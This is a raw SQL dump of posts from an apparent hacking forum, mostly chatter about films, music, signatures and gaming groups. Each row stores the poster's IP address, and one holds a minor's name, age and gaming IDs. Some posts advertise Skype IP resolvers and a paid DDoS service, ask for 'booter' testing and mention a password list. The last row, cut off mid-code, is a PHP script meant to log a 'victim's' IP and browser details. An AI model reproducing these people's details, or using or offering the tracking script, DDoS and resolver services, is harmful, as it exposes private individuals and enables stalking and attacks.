'75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7e78ce0d14baa0daa5a8d627851051b7', '0', '0'); INSERT INTO mybb_posts VALUES('2925', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '3', '??????????¢™', '1348974673', 'I voted for LH. Hopefully we can reach the top', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '4e53869bdcd693183bbaabf261aeca4f', '0', '0'); INSERT INTO mybb_posts VALUES('2926', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1348974888', 'I am glad that everyone likes them. I havent made any lately but I will try to make more soon', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '788dab94dadc3182ea3166d3357c05d9', '0', '0'); INSERT INTO mybb_posts VALUES('2927', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1348974953', 'I would love to try, but I can\'t. 1. I\'m not good with fonts.\n2. I don\'t know how to work on animated signatures.\n3. I recommend asking Reloadzor then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4bce0089d02017aea9b310116edc1c48', '0', '0'); INSERT INTO mybb_posts VALUES('2928', '604', '0', '61', 'Unique Sig and Header', '0', '3', '??????????¢™', '1348975430', '[b]Hello guys I am here to give you guys the Signature and Header of my old group that I had on HF. Hopefully you guys like them. Sorry the backgrounds are not transparent.[/b]\r\n\r\n[b][align=center][size=large][color=#FFD700]Signature[/color][/size][/align][/b]\r\n[align=center][img]http://i.imgur.com/0AsQd.gif[/img][/align]\r\n\r\n[b][align=center][size=large][color=#FFD700]Header[/color][/size][/align][/b]\r\n[align=center][img]http://i.imgur.com/nti1s.png[/img][/align]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7a4af2d75baad2a1454b2667101b2815', '0', '0'); INSERT INTO mybb_posts VALUES('2929', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1348975487', 'Hopefully he looks at this thread. Thanks anyways.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '2e129444ae82fa8af59ea82922ee5d25', '0', '0'); INSERT INTO mybb_posts VALUES('2930', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '1', 't3h jok3r', '1348975702', 'The BGs are not transparent but I think we can change the BG color.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43c072fc7244a7541b5dcda5d70b2889', '0', '0'); INSERT INTO mybb_posts VALUES('2931', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1348975840', 'I think you forgot. LH is not a post here PM me site. It\'s either you post the download or tell them to post and the OP PMs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dfa16434cd09be3c392cc569a65476a8', '0', '0'); INSERT INTO mybb_posts VALUES('2936', '605', '2934', '64', 'RE: Dredd 3D (2012) Movie RIP', '0', '1', 't3h jok3r', '1348977303', 'Nice share. Thanks I\'m going to watch it online later on tonight. Well tomorrow because there\'s like 5 mins left to 12.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a8b380fd03f06d085ed3805a2fbe138', '0', '0'); INSERT INTO mybb_posts VALUES('2937', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1348979665', 'No problem. Thanks for contributing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce652d4fa874bbc604f4b64405520c22', '0', '0'); INSERT INTO mybb_posts VALUES('2938', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348979854', 'No problem man, I am proud to be a staff member.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '31ad6dfc0ed7b623ecbd49d07e2b75d1', '0', '0'); INSERT INTO mybb_posts VALUES('2939', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '10', 'swa4567', '1348980338', 'No problem. Thanks for trying my tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f49f26e4b68fc2d381b87ae54c5d5ca8', '0', '0'); INSERT INTO mybb_posts VALUES('2940', '564', '2906', '7', 'RE: What Do You Do To Relax?', '0', '10', 'swa4567', '1348980431', '[quote=\'iTzIpod\' pid=\'2906\' dateline=\'1348970582\']\r\nI love Prison Break. So does t3h jok3r :p Too bad the series ended :/\r\n[/quote]\r\n\r\nWow lol i like it too. I\'m where scofield fails to escape sona.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '92063423bf1b8e52477a792d77ff1d16', '0', '0'); INSERT INTO mybb_posts VALUES('2941', '587', '2854', '65', 'RE: Who likes the Rocky Films?', '0', '3', '??????????¢™', '1348980688', 'Moved to the right section, Belonged in the Movie section.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'bc7ae4d6f1af86dbc983c347327d95ca', '0', '0'); INSERT INTO mybb_posts VALUES('2942', '607', '0', '7', 'Wanna laugh?', '0', '10', 'swa4567', '1348980994', '[b]Joke # 1[/b]\r\n\r\nYo momma so old her birth certificate says expired!\r\n\r\n[b]Joke # 2[/b]\r\n\r\nThe way yo glasses so big, when you look at the map you see people waving\r\n\r\n[b]Joke # 3[/b]\r\n\r\nLast time I checked your blood type is Ragu.\r\n\r\n[b]Joke # 4[/b]\r\n\r\nThe way you sooo ugly you make the devil read the bible.\r\n\r\n[b]Joke # 5[/b]\r\n\r\nThe way you so slow you remind me of you mom on new years night.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'cb2bf73e594e8b7ea219c65794f5e641', '0', '0'); INSERT INTO mybb_posts VALUES('2943', '608', '0', '66', 'Welcome To Gamers!', '0', '61', 'NXK', '1348983270', 'This will be our introductory thread, Please fill out all your details\n\nGamerTag - xINEXXONIx\nPSN - //\nSteam - jm19nyc\nSkype - //\n\nLike so!', '99.253.94.204', '1677549260', '1', '0', '61', '1349816777', '1', '3e485ff9f4a91cef999946ce79021acb', '0', '1349816777'); INSERT INTO mybb_posts VALUES('2944', '609', '0', '58', 'Gamers Recruitment', '0', '61', 'NXK', '1348983476', 'Want to join the gamers group? \r\n\r\nHow to join?\r\n\r\nMust have 10+ posts\r\nBe HQ\r\nNo scam reports \r\nPositive rep (Any negetives will be reviewed)\r\n\r\nId like to see people come up with there own Applications I wont set a limit for what you have to say. I want to see people that will take the initiative to write A HQ Application.\r\n\r\n(Thread will be remade tomorrow)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '21a4d496bc2319dce96f7e0de0642506', '0', '0'); INSERT INTO mybb_posts VALUES('2946', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '199', 'Anonymous™', '1348993811', 'I just watched the movie Ted.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '565d5de1a63ec502adf8ab48969f8439', '0', '0'); INSERT INTO mybb_posts VALUES('2947', '490', '2381', '49', 'RE: Forum Suggestion', '0', '199', 'Anonymous™', '1348994086', 'I also think it should be added, I like to play minecraft and League of Legends.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fef96446b4481cd7b0fdeb5b5c42068d', '0', '0'); INSERT INTO mybb_posts VALUES('2948', '488', '2507', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1348994196', '[quote=\'iTzIpod\' pid=\'2507\' dateline=\'1348456939\']\r\nThat song is alright. :p I personally don\'t like it. But different people = different opinion. I\'m listening to Owl City - Good Time\r\n[/quote]\r\n\r\nI do not know why but I really like this song.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fe54858073413f2be21f76b181205b17', '0', '0'); INSERT INTO mybb_posts VALUES('2949', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '53', 'sirchamp', '1348994485', 'Can I have the source code? Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '71401a9d3ba45040bcb60bf848de9d19', '0', '0'); INSERT INTO mybb_posts VALUES('2950', '587', '2903', '65', 'RE: Who likes the Rocky Films?', '0', '205', 'mothered', '1349005338', '[quote=\'Romdu62\' pid=\'2903\' dateline=\'1348970512\']\r\nNever heard of rocky films before.\r\n[/quote]\r\n\r\nSo you\'ve never heard of \"Rocky Balboa?\"\r\n\r\nThat has to be a first. Nonetheless, check It out and see what you think.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1858261db67e42beebc6a50f6447104c', '0', '0'); INSERT INTO mybb_posts VALUES('2951', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '62', 'R?????zo?', '1349005349', 'I will do this once I\'m free.\nshould be done later today.\n[hr]\n[img]http://i.imgur.com/4i7oz.gif[/img]\n\nnot sure what to make as avatar', '94.132.244.168', '1585771688', '1', '0', '62', '1349011945', '1', 'c3779c25c996cb0e16d7b5897b750f19', '0', '0'); INSERT INTO mybb_posts VALUES('2952', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '205', 'mothered', '1349005910', 'I wouldn\'t mind checking this out mate.\r\n\r\nThanking you In advance.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b12ee54cb49ac6d956fcca25b81286e7', '0', '0'); INSERT INTO mybb_posts VALUES('2953', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '205', 'mothered', '1349006044', 'I don\'t know you, but wish to welcome you back to LH :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a0c47dbb82567214c7e1a482ee113cb8', '0', '0'); INSERT INTO mybb_posts VALUES('2954', '560', '2788', '24', 'RE: Windows 7 Official direct downloads', '0', '205', 'mothered', '1349006238', 'You\'re welcome mate.\r\n\r\nThe page Is fine on my end. Try cleaning your browser\'s cache, or navigate via a different browser altogether.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '899da5f92c73034df2c7185c007a85e3', '0', '0'); INSERT INTO mybb_posts VALUES('2955', '514', '2616', '9', 'RE: How to make serious money', '0', '100', '??zg???g????61', '1349010631', '[quote=\'p420\' pid=\'2616\' dateline=\'1348679861\']\r\nNice method but when I click on buy now on the website, it opens the outlook mail program on my PC.\r\n[/quote]\r\n\r\nI found this under their FAQ section, it might help you.\r\n\r\n\r\n Click on \"Buy Now\" in front of the item you\'re interested in purchasing.\r\n You\'ll need an email client like \"Thunderbird\" or \"Microsoft Outlook\" for it to work.\r\n Your default mail client will popup with pre-filled text, edit as per your requirements.\r\n Click Send.\r\n If you don\'t have an email client or don\'t want to use one, copy the template found in the following \"PASTIE\" and mail us at codestore.eu@gmail.com\r\n You\'ll be replied within 12-16 hours.\r\n Pay as explained in the email, please don\'t write any notes while paying with PayPal or any other payment method.\r\n Your order will be delivered within 24 hours of payment. We expect you to wait atleast 24 hours if we\'ve not replied within the timeframe.\r\n You can request another download link if the link expires within a period of 7 days.\r\n Your satisfaction is our first priority and we do our best to resolve any issues.\r\n Please let us know if you\'ve any queries/problem at: codestore.eu@gmail.com', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'af33349b40626d7999a60f2d9355c9ed', '0', '0'); INSERT INTO mybb_posts VALUES('2956', '595', '2902', '65', 'RE: What movie did you watch recently?', '0', '53', 'sirchamp', '1349012241', '[quote=\'Romdu62\' pid=\'2902\' dateline=\'1348970474\']\r\nI watched Ted. Im not a kid its just that its a funny movie\r\n[/quote]\r\n\r\nI also watched ted. Funny film. Its not a film for kids. It\'s 16+', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6062fbabab2a6dd2f8855b27b91e0057', '0', '0'); INSERT INTO mybb_posts VALUES('2957', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '203', 'NeonLights', '1349012679', 'i just got the 200th member :D\nwhat do i get? :3', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '381a7d2197c9108f891f14b516f00bd9', '0', '0'); INSERT INTO mybb_posts VALUES('2958', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '100', '??zg???g????61', '1349014885', 'I just watched expendables 2 ;D', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'fec379acc2ab31c4a886c44d7531c9eb', '0', '0'); INSERT INTO mybb_posts VALUES('2959', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '100', '??zg???g????61', '1349015054', 'Welcome back sir ;D you sound HQ', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', '17979b32743db90f34a15cda82475429', '0', '0'); INSERT INTO mybb_posts VALUES('2960', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '2', 'Apathy', '1349016478', 'Welcome back reborn. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '354113a62c73dbaaf1c86daceb9e4cfb', '0', '0'); INSERT INTO mybb_posts VALUES('2961', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '2', 'Apathy', '1349016585', 'I watched the switch up. With Seth rogen.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'b7137515d8b87f94c75b8900d1873a04', '0', '0'); INSERT INTO mybb_posts VALUES('2962', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '82', 'iTzIpod', '1349016979', 'Never really saw this thread...\nI like the beats though! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96f8a62696ac409abf7d34449b2f3e7e', '0', '0'); INSERT INTO mybb_posts VALUES('2963', '607', '2942', '7', 'RE: Wanna laugh?', '0', '82', 'iTzIpod', '1349017192', 'I heard some of those jokes already :p \nPretty common. :p \n\nBut the Ragu one was pretty funny.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a228a99c748441bfb8b7c4598de5ea31', '0', '0'); INSERT INTO mybb_posts VALUES('2964', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '82', 'iTzIpod', '1349017505', 'Username: iTzIpod\nName: Ryan/Jacob\nAge: 13\nProfile: http://l33thacking.net/user-82.html\nWhy I should join Gamers: I should join Gamers because I play a lot of games. I have my own weaknesses and strengths. Ex: CoD. I can play good on Default Controller settings. But when I play on Tactical, I get messed up. I can\'t play on a low sensitivity. But I can play on the highest possible. \nI play a lot of games. I play from PC to Game Consoles (PS3) to Handheld Consoles (Nintendo DS) etc.\nWhat I can contribute in the group: Pretty much anything needed. If someone needs advice, I can try to give you some.\nPSN ID: SoaR_iPod\n\n\n\nI don\'t know :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e491d0314fb0da617d84c2660324e842', '0', '0'); INSERT INTO mybb_posts VALUES('2965', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349017647', 'http://www.1channel.ch/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '307ab62ff8d164b1445c14716c28b29e', '0', '0'); INSERT INTO mybb_posts VALUES('2966', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '82', 'iTzIpod', '1349017858', 'You get nothing :p I just want to congratulate L33tHacking on 200+ Members (Official) I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffd0f653fccf995fbd4517c381bc7e42', '0', '0'); INSERT INTO mybb_posts VALUES('2967', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1349017928', 'Rewatched 21 Jump St. Lmfao can\'t stop watching this :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '963e1803a209de0791559c4a992d3d35', '0', '0'); INSERT INTO mybb_posts VALUES('2968', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '203', 'NeonLights', '1349018007', 'ur fucking kidding me?\ni worked my ass of to get that dam user to use my refer link\nand now ur telling me this was a joke?', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'cef939726438ccaabc370fc260f9c72b', '0', '0'); INSERT INTO mybb_posts VALUES('2969', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '82', 'iTzIpod', '1349020020', 'Sorry. Totally forgot that I promised to give the winner a spot in Unique.\n\n\nYou\'re now in Unique.\n\n\nClosed', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '887dec0a793f132c9d078180e5489c3f', '0', '0'); INSERT INTO mybb_posts VALUES('2970', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '203', 'NeonLights', '1349020559', 'wow this is actually pretty good :0 good job on this :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a97d48aa19277b06d56348d7d82acd28', '0', '0'); INSERT INTO mybb_posts VALUES('2971', '610', '0', '61', 'Free Skype Resolver - Fast Resolve!', '0', '82', 'iTzIpod', '1349020752', 'Hey LH,\r\n\r\nThis Resolver is not mine. \r\nThe link for the resolver is: http://www.resolver.ciki.me/lf/resolver.php .\r\n\r\nHappy Resolving!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '70d06ffeda16b1a797824afc39023d81', '0', '0'); INSERT INTO mybb_posts VALUES('2972', '611', '0', '61', 'Another Webbased Skype IP Resolver!', '0', '82', 'iTzIpod', '1349020945', '[align=center][img]http://steamgift.info/FreeSkypeResolver.png[/img][/align]\r\n\r\n[b]\r\nHeres the link[/b]\r\n\r\nhttp://steamgift.info/resolve.php\r\n\r\n[b]Please leave a comment.[/b]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e034436e2c2b09a32121b4c93b16ab14', '0', '0'); INSERT INTO mybb_posts VALUES('2973', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '82', 'iTzIpod', '1349024105', 'My opinion, I don\'t like them. But like I said. It\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '169decd190b6da76097662a94005df10', '0', '0'); INSERT INTO mybb_posts VALUES('2974', '482', '2343', '61', 'RE: 3 Million Password List', '0', '82', 'iTzIpod', '1349024230', 'Updated link. Sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9373c6d92d70b3a75a1fef8db1a7099d', '0', '0'); INSERT INTO mybb_posts VALUES('2975', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '82', 'iTzIpod', '1349024419', 'GamerTag - N/A\nPSN - SoaR_iPod or iTzExtremeiPod\nSteam - N/A\nSkype - iTzIpod\n\n:D\n\nHey everyone. I\'m guessing I\'m the 2nd Member in Gamers. I hope... :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '824ea56ac2ca37f0cdf33f3f17b457da', '0', '0'); INSERT INTO mybb_posts VALUES('2976', '612', '0', '66', 'Rate this edit?', '0', '82', 'iTzIpod', '1349024570', '[video=youtube]http://www.youtube.com/watch?v=mxjz1fMSpqQ[/video]\r\n\r\n\r\nNot me :( Wish it was xD\r\n\r\n\r\nAlso, PrestigeMontageHD has inactive subs. I don\'t recommend them sponsor you. Their clips aren\'t that good. But some of them are. Most of them aren\'t.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a2e935028496940fe78e9b01ef2e5de', '0', '0'); INSERT INTO mybb_posts VALUES('2977', '613', '0', '66', 'Some Changes that will be made', '0', '61', 'NXK', '1349024681', 'I\'ve decided to change the userbar to something else. I don\'t think the colors of the userbar now Really match the color scheme of this website So Ill be switching it to something more basic.\r\n\r\nThis is going to be the new userbar.\r\n\r\n[img]http://i.imgur.com/CWKlk.png[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '83bd5f39734947ee66c252c8b1876647', '0', '0'); INSERT INTO mybb_posts VALUES('2978', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349024699', 'Thank you, for welcoming me back. Its nice to be back.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '13e048fad59b1717b391b653fdde2f9f', '0', '0'); INSERT INTO mybb_posts VALUES('2979', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349024825', 'I have sent the source to everyone above. Enjoy :)', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'cb659e7b4cacca383cf351df533ba0e8', '0', '0'); INSERT INTO mybb_posts VALUES('2980', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1349024849', 'Do you want me to change it saying : \"Gamers\" instead of Gamer?\n\nThat\'s mine right? O_o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f2ac68611dd936416ed024370b085c9', '0', '0'); INSERT INTO mybb_posts VALUES('2981', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '3', '??????????¢™', '1349024875', 'Its okay, I was just giving them to you guys if you wanted to use them but if you dont like them you dont have to use them.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e0e6a673c93716d27a6711d06f1289bd', '0', '0'); INSERT INTO mybb_posts VALUES('2982', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1349024962', 'Thanks man, I really appreciate it.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '21423dd7efb347b5cb253b5f1d0cbf88', '0', '0'); INSERT INTO mybb_posts VALUES('2983', '613', '2980', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349024979', '[quote=\'iTzIpod\' pid=\'2980\' dateline=\'1349024849\']\r\nDo you want me to change it saying : \"Gamers\" instead of Gamer?\r\n\r\nThat\'s mine right? O_o\r\n[/quote]\r\n\r\nIt is yours still, and No don\'t worry about it. These are just temporary untill I get the real ones made. Ill probably end up paying for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a55b719be6924226fdcbf21e83620c6e', '0', '0'); INSERT INTO mybb_posts VALUES('2984', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1349025030', 'Thanks everyone, I am glad that you like them.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'debc2b6779f0aa4a96ca041a9aea624e', '0', '0'); INSERT INTO mybb_posts VALUES('2985', '602', '2951', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1349025037', '[quote=\'R?????zo?\' pid=\'2951\' dateline=\'1349005349\']\r\nI will do this once I\'m free.\r\nshould be done later today.\r\n[img]http://i.imgur.com/4i7oz.gif[/img]\r\n\r\nnot sure what to make as avatar\r\n[/quote]\r\n\r\nKinda big don\'t you think? I suggest you try resizing it a little bit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50b6509c620cc36b2a2108282f6116b0', '0', '0'); INSERT INTO mybb_posts VALUES('2986', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '61', 'NXK', '1349025296', 'Last movie I watched was lawless, It\'s bad ass. Really good movie if you\'re into old school proabition era Movies and crime movies. \n(It\'s about bootlegging and moonshine)', '99.253.94.204', '1677549260', '1', '0', '61', '1349025312', '1', '16116a1c969f0b22046596c5362f559a', '0', '1349025312'); INSERT INTO mybb_posts VALUES('2987', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '61', 'NXK', '1349025399', 'I have no idea who you are really either, But hi super mod buddy. Lets be bestest friends for ever.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '625e551dba4c3a77cd6afe243edaca32', '0', '0'); INSERT INTO mybb_posts VALUES('2988', '602', '2985', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1349025412', '[quote=\'iTzIpod\' pid=\'2985\' dateline=\'1349025037\']\r\n[quote=\'R?????zo?\' pid=\'2951\' dateline=\'1349005349\']\r\nI will do this once I\'m free.\r\nshould be done later today.\r\n[img]http://i.imgur.com/4i7oz.gif[/img]\r\n\r\nnot sure what to make as avatar\r\n[/quote]\r\n\r\nKinda big don\'t you think? I suggest you try resizing it a little bit.\r\n[/quote]\r\n\r\nAlso could you put the BG transparent if you could? Thanks', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '5180a3f7585fbb62cf02a34982e6c7de', '0', '0'); INSERT INTO mybb_posts VALUES('2989', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349025485', 'I was the first admin on this site when it first opened up. I left due to school and got banned over a misunderstanding. I might become admin again when Joker gets back on.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '5cb99c92eda88c465e87641689f36e86', '0', '0'); INSERT INTO mybb_posts VALUES('2990', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '100', '??zg???g????61', '1349026072', 'Nice dubstep, I love it! You should put that shit on iTunes ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd057634d24fca47eb2a8d623de232864', '0', '0'); INSERT INTO mybb_posts VALUES('2991', '600', '2912', '58', 'RE: OMG HERE IT COMES!', '0', '61', 'NXK', '1349026120', 'Check out our recruitment thread! We NEED MORE GAMERS!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5acae6e011f719d1c95e0e6baf40f2ae', '0', '0'); INSERT INTO mybb_posts VALUES('2992', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1349026180', 'Alright. Good luck. I don\'t got any money on me because I payed you my last $$. So..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3007010b83b8fb672ea2faf3cf9496f2', '0', '0'); INSERT INTO mybb_posts VALUES('2993', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '82', 'iTzIpod', '1349026259', '3 Admins? O_o \n\n\nSeems legit.\n\n\nUnless he demotes Apathy and then promotes you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fad9fc85af68d209cbeb0cac390126e9', '0', '0'); INSERT INTO mybb_posts VALUES('2994', '601', '2993', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349026640', '[quote=\'iTzIpod\' pid=\'2993\' dateline=\'1349026259\']\r\n3 Admins? O_o \r\n\r\n\r\nSeems legit.\r\n\r\n\r\nUnless he demotes Apathy and then promotes you.\r\n[/quote]\r\n\r\nHe wont be demoting anyone, and I said maybe.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'd290c2c520128ba3e768d02358067548', '0', '0'); INSERT INTO mybb_posts VALUES('2995', '17', '2990', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1349026715', '[quote=\'GRONgamer61\' pid=\'2990\' dateline=\'1349026072\']\r\nNice dubstep, I love it! You should put that shit on iTunes ;D\r\n[/quote]\r\nI never thought about that and I dont even have an iTunes account.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '31fb6bddbb77355e74ab79cadba591d6', '0', '0'); INSERT INTO mybb_posts VALUES('2996', '613', '2992', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349026748', '[quote=\'iTzIpod\' pid=\'2992\' dateline=\'1349026180\']\r\nAlright. Good luck. I don\'t got any money on me because I payed you my last $$. So..\r\n[/quote]\r\nIll be paying for it all since It\'s my group.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'fb74d3ac76609fb3564dce63d570a050', '0', '0'); INSERT INTO mybb_posts VALUES('2997', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '62', 'R?????zo?', '1349028112', 'as said before, gif\'s lose quality with transparent backgrounds, so I have to use the same background color where it will be', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '90c6802f5e9b870331c4a607036c8f3b', '0', '0'); INSERT INTO mybb_posts VALUES('2998', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '62', 'R?????zo?', '1349028513', 'if you really want something like that, i can make it no problems.\ni will do that if it\'s going to be used though, else will be a waste of time.', '94.132.244.168', '1585771688', '1', '0', '62', '1349028534', '1', '1342d95820a9551fd8831542afcf9315', '0', '1349028534'); INSERT INTO mybb_posts VALUES('3000', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349029835', 'Heyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '2170dc41309bb1abf7a8cff80613ab8f', '0', '0'); INSERT INTO mybb_posts VALUES('3001', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1349031624', 'Is it for your thread or just for your signature? O_o\n\nBecause if it\'s for your thread, you\'re probably talking about a banner or template.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d93059a851b3d2dbe5f78eb3578dd42', '0', '0'); INSERT INTO mybb_posts VALUES('3002', '614', '0', '3', 'Absence for 5 days', '0', '53', 'sirchamp', '1349033023', 'Hey guys\r\n\r\nIm going on a school trip tomorow. For five days. So I\'ll be back at the 5.10.12\r\nSee you in a week guys. \r\n\r\nByebye ;)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '91e1c282dbf85fb21f5522dcc6aba880', '0', '0'); INSERT INTO mybb_posts VALUES('3003', '614', '3002', '3', 'RE: Absence for 5 days', '0', '82', 'iTzIpod', '1349033107', 'Bye sirchamp.\n\nHave fun on your school trip.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0c7d5c34b61bfb08c7cae2c94eb68219', '0', '0'); INSERT INTO mybb_posts VALUES('3004', '615', '0', '21', 'Could somone test the output of 2 differen\'t booters I use?', '0', '100', '??zg???g????61', '1349033390', 'Heyo, I was hoping someone could help me test the output of two different booters I use. Thanks.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '541d07755c510e9608c11e563eb033b9', '0', '0'); INSERT INTO mybb_posts VALUES('3005', '616', '0', '67', '[PHP] IP Grabbing Script', '0', '82', 'iTzIpod', '1349034777', '1 : Upload the Index.php to your website.\r\n2 : Make your victim visit the website.\r\n3 : The log\'s will be saved in www.site.com/xxxx.txt\r\n\r\n[code]\r\n<html>\r\n<head>\r\n<?php\r\n$ip = $_SERVER[\'REMOTE_ADDR\']; // Grabbing the IP\r\n$time = date(\"l F dS h:i:s A Y\"); // Logging the time and date \r\n$hostaddress = gethostbyaddr($ip); // Host name \r\n$browser = $_SERVER[\'HTTP_USER_AGENT\']; // needs work\r\n$referred = $_SERVER[\'HTTP_REFERER\']; // referrer 